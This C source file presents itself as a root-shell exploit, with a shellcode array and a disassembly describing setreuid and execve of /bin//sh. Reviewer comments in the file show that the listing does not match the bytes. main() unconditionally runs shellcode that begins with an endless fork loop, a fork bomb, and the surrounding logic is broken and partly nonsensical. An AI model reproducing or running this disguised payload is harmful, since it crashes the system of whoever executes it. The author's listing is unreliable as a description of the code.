- #include <stdio.h>
- #include <unistd.h>
- #include <string.h>
- char shellcode[] = "\x6a\x02\x58\xcd\x80\xeb\xf9"
- "\x6a\x05\x58\x99\x52\x68\x74\x79\x31\x30\x68\x2f\x2f\x2f\x74"
- "\x68\x2f\x64\x65\x76\x89\xe3\x89\xd1\xcd\x80\x89\xc3\x6a\x36"
- "\x58\xb9\xcf\xb4\xff\xff\xf7\xd1\xba\xdc\x34\xfa\x03\xcd\x80";
- /*
- * NOTE(review): the disassembly below does not describe shellcode[].
- * The listing opens with "push byte +0x46" (bytes 6a 46); the array opens
- * with 6a 02 58 cd 80 eb f9, which on i386 Linux is push 2 / pop eax /
- * int 0x80 (syscall 2, fork) followed by a short jump back to offset 0,
- * i.e. an endless fork loop. The execve sequence listed here, with its
- * "/bin//sh" and "-c" pushes, does not occur anywhere in the array.
- * The bytes after the loop push the ASCII text "/dev", "///t", "ty10" and
- * issue two more int 0x80 calls (eax 5 and 0x36); they look unreachable
- * because both sides of the fork take the jump back -- confirm with a
- * disassembler before relying on this reading.
- * When auditing, take the array as the description of what runs, not
- * the author's listing that follows.
- *
- * setreuid(0, 0);
- * push byte +0x46
- * pop eax
- * xor ebx,ebx
- * xor ecx,ecx
- * int 0x80
- *
- * execve("/bin//sh", ["/bin//sh", "-c", "cmd"], NULL);
- * jmp short 0x2c
- * pop edi
- * push byte +0xb
- * pop eax
- * cdq
- * push edx
- * push word 0x632d
- * mov esi,esp
- * push edx
- * push dword 0x68732f2f
- * push dword 0x6e69622f
- * mov ebx,esp
- * push edx
- * push edi
- * push esi
- * push ebx
- * mov ecx,esp
- * int 0x80
- * call 0xb
- * "cmd; exit;"
- */
- int main(int argc, char * argv[]) /* NOTE(review): reads like an exploit
- * launcher, but the only statement with an effect is the call into
- * shellcode[] a few lines down; the argument handling before it and the
- * personality() loop after it do not feed that call. Returns 0 after
- * printing "Fail." if the loop runs to completion. */
- {
- char buffer[1024];
- int loop, ret;
- if (argc == 1){
- printf("using default target program :: /bin/ls\n");
- strcpy(buffer, "/bin/ls");
- } /* no else: the next strcpy still runs with argv[1] == NULL when argc == 1 */
- strcpy(buffer,argv[1]); /* unbounded copy of a command-line argument into the 1024-byte stack buffer */
- memset(buffer,0x90,1024); /* overwrites whatever was just copied; buffer is never used as a path or passed to anything */
- void (*b)()=shellcode;b(); /* calls into the shellcode[] data array unconditionally, before any of the logic below; presumably faults instead where data pages are mapped non-executable -- confirm per platform */
- for (loop=0;loop<0x10000;loop++){
- ret = personality(b); /* passes a function pointer where personality() takes an unsigned long persona; <sys/personality.h> is not among the includes shown */
- if (ret==-71393){ /* personality() is documented to return the previous persona or -1, so this branch looks unreachable -- confirm */
- //
- // hellcode injection
- //
- memset(buffer, 0x90, 1024);
- buffer[ret - 0xa8 + loop / 2 * 39] = /* with ret == -71393 this subscript starts at -71561 and is inside buffer only for a narrow range of loop values */
- buffer[ret - 0xfb * sizeof(long)]; /* sizeof makes this unsigned arithmetic: ret wraps to a huge size_t, so the read is far outside buffer */
- printf("Yay!! !!");
- exit(0); /* <stdlib.h> is not among the includes shown */
- }
- }
- printf("Fail.\n");
- return 0;
- }